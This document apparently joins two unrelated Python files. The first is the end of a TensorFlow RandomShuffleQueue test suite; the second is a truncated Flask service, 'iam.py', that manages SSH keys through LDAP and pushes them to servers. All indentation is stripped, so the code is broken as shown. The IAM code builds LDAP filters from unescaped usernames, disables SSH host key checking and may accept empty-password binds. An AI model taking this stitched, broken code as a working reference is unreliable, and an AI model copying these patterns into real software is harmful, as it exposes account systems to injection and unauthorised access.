# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(finished), 0)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(finished), 1)
def testBlockingDequeueManyFromClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
progress = [] # Must be mutable
def dequeue():
self.assertItemsEqual(elems, self.evaluate(dequeued_t))
progress.append(1)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
progress.append(2)
self.assertEqual(len(progress), 0)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
for _ in range(100):
time.sleep(0.01)
if len(progress) == 1:
break
self.assertEqual(len(progress), 1)
time.sleep(0.01)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(progress), 2)
def testBlockingDequeueUpToFromClosedQueueReturnsRemainder(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(self.evaluate(dequeued_t))
self.assertEquals(3, len(results))
results.extend(self.evaluate(dequeued_t))
self.assertEquals(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueUpToSmallerThanMinAfterDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
capacity=10,
min_after_dequeue=2,
dtypes=dtypes_lib.float32,
shapes=((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(self.evaluate(dequeued_t))
self.assertEquals(3, len(results))
# min_after_dequeue is 2, we ask for 3 elements, and we end up only
# getting the remaining 1.
results.extend(self.evaluate(dequeued_t))
self.assertEquals(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueManyFromClosedQueueWithElementsRemaining(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
cleanup_dequeue_t = q.dequeue_many(q.size())
enqueue_op.run()
results = []
def dequeue():
results.extend(self.evaluate(dequeued_t))
self.assertEqual(len(results), 3)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
# Although the last dequeue failed, we want to ensure that it returns
# any elements that it potentially reserved to dequeue. Thus the
# next cleanup should return a single element.
results.extend(self.evaluate(cleanup_dequeue_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(results), 4)
def testBlockingDequeueManyFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueUpToFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_up_to(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 4, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testEnqueueManyToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testBlockingEnqueueToFullQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0], results)
# There wasn't room for 50.0 in the queue when the first element was
# dequeued.
self.assertNotEqual(50.0, results[0])
thread.join()
def testBlockingEnqueueManyToFullQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
time.sleep(0.01)
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0, 60.0], results)
# There wasn't room for 50.0 or 60.0 in the queue when the first
# element was dequeued.
self.assertNotEqual(50.0, results[0])
self.assertNotEqual(60.0, results[0])
# Similarly for 60.0 and the second element.
self.assertNotEqual(60.0, results[1])
thread.join()
def testBlockingEnqueueToClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
close_op = q.close()
enqueue_op.run()
def blocking_enqueue():
# Expect the operation to succeed since it will complete
# before the queue is closed.
self.evaluate(blocking_enqueue_op)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
self.evaluate(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# The close_op should run after the first blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def blocking_close():
self.evaluate(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Wait for the close op to block before unblocking the enqueue.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
# Dequeue to unblock the first blocking_enqueue_op, after which the
# close will complete.
results.append(dequeued_t.eval())
self.assertTrue(results[0] in elems)
thread2.join()
thread1.join()
def testBlockingEnqueueManyToClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
close_op = q.close()
size_t = q.size()
enqueue_op.run()
self.assertEqual(size_t.eval(), 3)
def blocking_enqueue():
# This will block until the dequeue after the close.
self.evaluate(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# The blocking_enqueue_op has enqueued 1 of its 2 elements and is blocked
# waiting for one more element to be dequeued.
for i in range(50):
queue_size = self.evaluate(size_t)
if queue_size == 4:
break
elif i == 49:
self.fail(
"Blocking enqueue op did not execute within the expected time.")
time.sleep(0.1)
def blocking_close():
self.evaluate(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Unblock the first blocking_enqueue_op in blocking_enqueue.
q.dequeue().eval()
thread2.join()
thread1.join()
# At this point the close operation will complete, so the next enqueue
# will fail.
with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
self.evaluate(blocking_enqueue_op)
def testSharedQueueSameSession(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1.enqueue((10.0,)).run()
# TensorFlow TestCase adds a default graph seed (=87654321). We check if
# the seed computed from the default graph seed is reproduced.
seed = 887634792
q2 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=seed)
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q2.dequeue().eval(), 10.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
q2.enqueue((20.0,)).run()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q1.dequeue().eval(), 20.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
def testSharedQueueSameSessionGraphSeedNone(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=98765432)
q1.enqueue((10.0,)).run()
# If neither a graph seed nor an op seed is provided, the default value must
# be used, and when the shared queue already exists, the second queue op must
# accept whatever seed value was used previously.
random_seed.set_random_seed(None)
q2 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
def testIncompatibleSharedQueueErrors(self):
with self.cached_session():
q_a_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_a")
q_a_2 = data_flow_ops.RandomShuffleQueue(
15, 5, dtypes_lib.float32, shared_name="q_a")
q_a_1.queue_ref.op.run()
with self.assertRaisesOpError("capacity"):
q_a_2.queue_ref.op.run()
q_b_1 = data_flow_ops.RandomShuffleQueue(
10, 0, dtypes_lib.float32, shared_name="q_b")
q_b_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_b")
q_b_1.queue_ref.op.run()
with self.assertRaisesOpError("min_after_dequeue"):
q_b_2.queue_ref.op.run()
q_c_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_c")
q_c_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shared_name="q_c")
q_c_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_c_2.queue_ref.op.run()
q_d_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_d")
q_d_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
q_d_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_d_2.queue_ref.op.run()
q_e_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
q_e_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_e")
q_e_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_e_2.queue_ref.op.run()
q_f_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_f")
q_f_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 4)], shared_name="q_f")
q_f_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_f_2.queue_ref.op.run()
q_g_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_g")
q_g_2 = data_flow_ops.RandomShuffleQueue(
10, 5, (dtypes_lib.float32, dtypes_lib.int32), shared_name="q_g")
q_g_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_g_2.queue_ref.op.run()
q_h_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=12, shared_name="q_h")
q_h_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=21, shared_name="q_h")
q_h_1.queue_ref.op.run()
with self.assertRaisesOpError("random seeds"):
q_h_2.queue_ref.op.run()
def testSelectQueue(self):
with self.cached_session():
num_queues = 10
qlist = list()
for _ in xrange(num_queues):
qlist.append(
data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32))
# Enqueue/Dequeue into a dynamically selected queue
for _ in xrange(20):
index = np.random.randint(num_queues)
q = data_flow_ops.RandomShuffleQueue.from_list(index, qlist)
q.enqueue((10.,)).run()
self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
q2 = data_flow_ops.RandomShuffleQueue(15, 0, dtypes_lib.float32)
enq_q = data_flow_ops.RandomShuffleQueue.from_list(3, [q1, q2])
with self.assertRaisesOpError("is not in"):
enq_q.dequeue().eval()
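# Helpers for testResetOfBlockingOperation below: each one blocks on the given
# op and expects it to be cancelled when the session is closed.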
def _blockingDequeue(self, sess, dequeue_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_many_op)
def _blockingDequeueUpTo(self, sess, dequeue_up_to_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_up_to_op)
def _blockingEnqueue(self, sess, enqueue_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(enqueue_many_op)
def testResetOfBlockingOperation(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q_empty = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, (
(),))
dequeue_op = q_empty.dequeue()
dequeue_many_op = q_empty.dequeue_many(1)
dequeue_up_to_op = q_empty.dequeue_up_to(1)
q_full = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, ((),))
sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
enqueue_op = q_full.enqueue((6.0,))
enqueue_many_op = q_full.enqueue_many(([6.0],))
threads = [
self.checkedThread(
self._blockingDequeue, args=(sess, dequeue_op)),
self.checkedThread(
self._blockingDequeueMany, args=(sess, dequeue_many_op)),
self.checkedThread(
self._blockingDequeueUpTo, args=(sess, dequeue_up_to_op)),
self.checkedThread(
self._blockingEnqueue, args=(sess, enqueue_op)),
self.checkedThread(
self._blockingEnqueueMany, args=(sess, enqueue_many_op))
]
for t in threads:
t.start()
time.sleep(0.1)
sess.close() # Will cancel the blocked operations.
for t in threads:
t.join()
def testDequeueManyInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_many(5)
deq2 = q2.dequeue_many(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueUpToInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_up_to(5)
deq2 = q2.dequeue_up_to(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue()
deq2 = q2.dequeue()
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
for _ in range(5):
results[0].append(deq1.eval())
results[1].append(deq2.eval())
q1.close().run()
q2.close().run()
for _ in range(5):
results[2].append(deq1.eval())
results[3].append(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testBigEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.int32, ((),))
elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
enq = q.enqueue_many((elem,))
deq = q.dequeue()
size_op = q.size()
enq_done = []
def blocking_enqueue():
enq_done.append(False)
# This will fill the queue and then block until enough dequeues happen.
self.evaluate(enq)
enq_done.append(True)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The enqueue should start and then block.
results = []
results.append(deq.eval()) # Will only complete after the enqueue starts.
self.assertEqual(len(enq_done), 1)
self.assertEqual(self.evaluate(size_op), 5)
for _ in range(3):
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 1)
self.assertEqual(self.evaluate(size_op), 5)
# This dequeue will unblock the thread.
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 2)
thread.join()
for i in range(5):
self.assertEqual(size_op.eval(), 5 - i)
results.append(deq.eval())
self.assertEqual(size_op.eval(), 5 - i - 1)
self.assertItemsEqual(elem, results)
def testBigDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(2, 0, dtypes_lib.int32, ((),))
elem = np.arange(4, dtype=np.int32)
enq_list = [q.enqueue((e,)) for e in elem]
deq = q.dequeue_many(4)
results = []
def blocking_dequeue():
# Will only complete after 4 enqueues complete.
results.extend(self.evaluate(deq))
thread = self.checkedThread(target=blocking_dequeue)
thread.start()
# The dequeue should start and then block.
for enq in enq_list:
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(results), 0)
self.evaluate(enq)
# Enough enqueued to unblock the dequeue
thread.join()
self.assertItemsEqual(elem, results)
if __name__ == "__main__":
test.main()
|
iam.py
|
#!/usr/bin/env python3
import threading
import ldap
import os
import sqlite3
import queue
import atexit
import subprocess
import multiprocessing
import json
from datetime import datetime
from io import StringIO
from flask import Flask, request, redirect, url_for, flash, render_template, abort, Response, g, make_response
from pprint import pprint
from gevent.wsgi import WSGIServer
import settings
copy_queue = queue.Queue()
copy_log = []
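# Runs in a worker process: opens an SSH session to `host` as the "iam" user,
# feeds it the JSON payload on stdin, and captures stdout/stderr. The remote
# side is expected to apply the keys; a 10 second timeout kills hung sessions.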
def copy(args):
host, text = args
cmd = ['ssh', '-i', settings.IDENTITY_FILE, '-o', 'StrictHostKeyChecking no', 'iam@' + host]
process = subprocess.Popen(cmd, universal_newlines=True, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
out, err = process.communicate(text, timeout=10)
except subprocess.TimeoutExpired:
process.kill()
out, err = process.communicate()
return host, out, err
def now():
return '[' + datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f') + ']'
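# Background worker thread: consumes a username (or None meaning "all users")
# from copy_queue, reads every stored SSH key from the database, refreshes
# display names from LDAP, and pushes the resulting JSON to each configured
# server via the copy() helper. The string 'EXIT' is the shutdown sentinel
# (see stop_thread at the bottom of this file).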
def thread_copy_ssh_key():
global copy_log
print('thread_copy_ssh_key started')
conn = sqlite3.connect(settings.DB_NAME)
conn.row_factory = sqlite3.Row
while True:
initiator = copy_queue.get()
print('thread_copy_ssh_key: got task', initiator)
if initiator == 'EXIT':
return
copy_log = [now() + 'task started by ' + str(initiator)]
cur = conn.cursor()
cur.execute('SELECT username, keys FROM keys')
keys = {row['username']: row['keys'] for row in cur.fetchall()}
users = list(keys.keys()) if initiator is None else [initiator]
for username in keys:
name = ldap_get_display_name(username)
cur.execute('UPDATE users SET name=? WHERE username=?', (name, username))
conn.commit()
cur.close()
msg = dict(user_keys=keys, users=users)
text = json.dumps(msg, indent=2)
tasks = [(s, text) for s in settings.SERVERS.values()]
pool = multiprocessing.Pool(processes=max(len(settings.SERVERS), 1))
for host, out, err in pool.imap(copy, tasks):
copy_log.append(now() + host)
out_lines = out.splitlines()
out_lines = out_lines[out_lines.index('====== START IAM SHELL ======')+1:]
copy_log.extend(out_lines)
copy_log.append('-'*30)
pool.terminate()
pool.join()
copy_log.append(now() + 'done')
app = Flask(__name__)
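# Per-request SQLite handle kept on flask.g; the schema is created lazily with
# CREATE TABLE IF NOT EXISTS so the app can start against an empty database.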
def get_db():
db = getattr(g, '_database', None)
if db is None:
conn = sqlite3.connect(settings.DB_NAME)
conn.executescript('''
CREATE TABLE IF NOT EXISTS users (
username TEXT UNIQUE,
name TEXT,
port INTEGER,
subuid INTEGER
);
CREATE TABLE IF NOT EXISTS keys (
username TEXT UNIQUE,
keys TEXT
);
''')
conn.row_factory = sqlite3.Row
db = g._database = conn
return db
@app.teardown_appcontext
def close_connection(exception):
db = getattr(g, '_database', None)
if db is not None:
db.close()
def ldap_get_display_name(username):
ldap_url = 'ldap://{}/{}'.format(settings.LDAP_HOST, settings.LDAP_DOMAIN)
l = ldap.initialize(ldap_url)
l.simple_bind_s(settings.LDAP_IAM_USER, settings.LDAP_IAM_PASS)
base = ','.join(['cn=users'] + settings.LDAP_BASE)
res = l.search_s(base, ldap.SCOPE_SUBTREE, 'sAMAccountName=' + username, ['displayName'])
name = ''
if res:
cn, d = res[0]
names = d.get('displayName', [])
name = names[0] if names else ''
return str(name, 'utf-8')
def ldap_username_check(username):
ldap_url = 'ldap://{}/{}'.format(settings.LDAP_HOST, settings.LDAP_DOMAIN)
l = ldap.initialize(ldap_url)
l.simple_bind_s(settings.LDAP_IAM_USER, settings.LDAP_IAM_PASS)
base = ','.join(['cn=users'] + settings.LDAP_BASE)
u = l.search_s(base, ldap.SCOPE_SUBTREE, 'sAMAccountName=' + username, ['sAMAccountName'])
return len(u) > 0
def ldap_login_check(username, password):
ldap_url = 'ldap://{}/{}'.format(settings.LDAP_HOST, settings.LDAP_DOMAIN)
l = ldap.initialize(ldap_url)
try:
l.simple_bind_s(username + '@' + settings.LDAP_DOMAIN, password)
return True
except:
return False
def get_user(username):
cur = get_db().cursor()
cur.execute('SELECT name, port, subuid FROM users WHERE username=?', (username, ))
row = cur.fetchone()
if row:
return row['name'], row['port'], row['subuid']
return None, None, None
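# Creates the user row on first contact. The SSH port is allocated as
# max(existing max port, MIN_PORT) + 1 and the subordinate UID range start as
# max(existing max subuid, MIN_SUBUID) + 65536, i.e. one 65536-wide range per user.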
def ensure_user(username):
name, port, subuid = get_user(username)
if not port:
cur = get_db().cursor()
cur.execute('SELECT MAX(port) AS max_port, MAX(subuid) AS max_subuid FROM users')
row = cur.fetchone()
# Guard against an empty users table, where MAX(...) yields NULL/None.
port = max(settings.MIN_PORT, row['max_port'] or settings.MIN_PORT) + 1
subuid = max(settings.MIN_SUBUID, row['max_subuid'] or settings.MIN_SUBUID) + 65536
name = ldap_get_display_name(username)
cur.execute('INSERT INTO users (username, name, port, subuid) VALUES (?, ?, ?, ?)', (username, name, port, subuid))
get_db().commit()
return name, port, subuid
@app.route('/user/<username>/name')
def get_name(username):
name, port, subuid = get_user(username)
if port:
response = make_response(str(name))
response.headers["content-type"] = "text/plain"
return response
else:
abort(404)
@app.route('/user/<username>/port')
def get_port(username):
name, port, subuid = get_user(username)
if port:
response = make_response(str(port))
response.headers["content-type"] = "text/plain"
return response
else:
abort(404)
@app.route('/user/<username>/subuid')
def get_subuid(username):
name, port, subuid = get_user(username)
if port:
response = make_response(str(subuid))
response.headers["content-type"] = "text/plain"
return response
else:
abort(404)
@app.route('/user/<username>/.ssh/authorized_keys')
def get_ssh_key(username):
name, port, subuid = get_user(username)
if port:
cur = get_db().cursor()
cur.execute('SELECT keys FROM keys WHERE username=?', (username,))
row = cur.fetchone()
keys = row['keys'] if row else ''
response = make_response(keys)
response.headers["content-type"] = "text/plain"
return response
else:
abort(404)
@app.route('/user/<username>/.ssh/config')
def get_ssh_config(username):
sio = StringIO()
for name, host in settings.SERVERS.items():
sio.write('Host {}-manage\n'.format(name))
sio.write(' HostName {}\n'.format(host))
sio.write(' User {}\n'.format(username))
cur = get_db().cursor()
cur.execute('SELECT port FROM users WHERE username=?', (username,))
row = cur.fetchone()
if row:
for name, host in settings.SERVERS.items():
sio.write('Host {}\n'.format(name))
sio.write(' HostName {}\n'.format(host))
sio.write(' User {}\n'.format(username))
sio.write(' Port {}\n'.format(row['port']))
response = make_response(sio.getvalue())
response.headers["content-type"] = "text/plain"
return response
@app.route('/users')
def get_users_list():
sio = StringIO()
cur = get_db().cursor()
cur.execute('SELECT * FROM users')
users = cur.fetchall()
for u in users:
sio.write('{},{},{},{}\n'.format(u['username'], u['name'], u['port'], u['subuid']))
response = make_response(sio.getvalue())
response.headers["content-type"] = "text/plain"
return response
@app.route('/manage/ssh-key', methods=['POST'])
def get_manage_ssh_key_redirect():
username = request.form['username']
return redirect(url_for('get_manage_ssh_key', username=username))
@app.route('/manage/ssh-key/<username>')
def get_manage_ssh_key(username):
if ldap_username_check(username):
ensure_user(username)
else:
abort(404)
cur = get_db().cursor()
cur.execute('SELECT keys FROM keys WHERE username=?', (username,))
row = cur.fetchone()
keys = row['keys'] if row else ''
return render_template('manage_ssh_key.html', username=username, keys=keys)
@app.route('/manage/ssh-key/<username>', methods=['POST'])
def post_manage_ssh_key(username):
password = request.form['password']
keys = request.form['keys']
if not ldap_login_check(username, password):
abort(401)
cur = get_db().cursor()
cur.execute('DELETE FROM keys WHERE username=?', (username,))
cur.execute('INSERT INTO keys (username, keys) VALUES (?, ?)', (username, keys))
get_db().commit()
copy_queue.put(username)
return redirect(url_for('get_copy_ssh_key_log'))
@app.route('/manage/send-all-keys', methods=['POST'])
def post_send_all_keys():
username = request.form['username']
password = request.form['password']
if not ldap_login_check(username, password):
abort(401)
copy_queue.put(None)
return redirect(url_for('get_copy_ssh_key_log'))
@app.route('/log/push-keys')
def get_copy_ssh_key_log():
text = '\n'.join(copy_log) + '\n'
response = make_response(text)
response.headers["content-type"] = "text/plain"
if text.strip() and 'done' not in text:
response.headers["Refresh"] = '1; url=' + url_for('get_copy_ssh_key_log')
return response
@app.route('/')
def get_homepage():
cur = get_db().cursor()
cur.execute('SELECT * FROM users')
users = cur.fetchall()
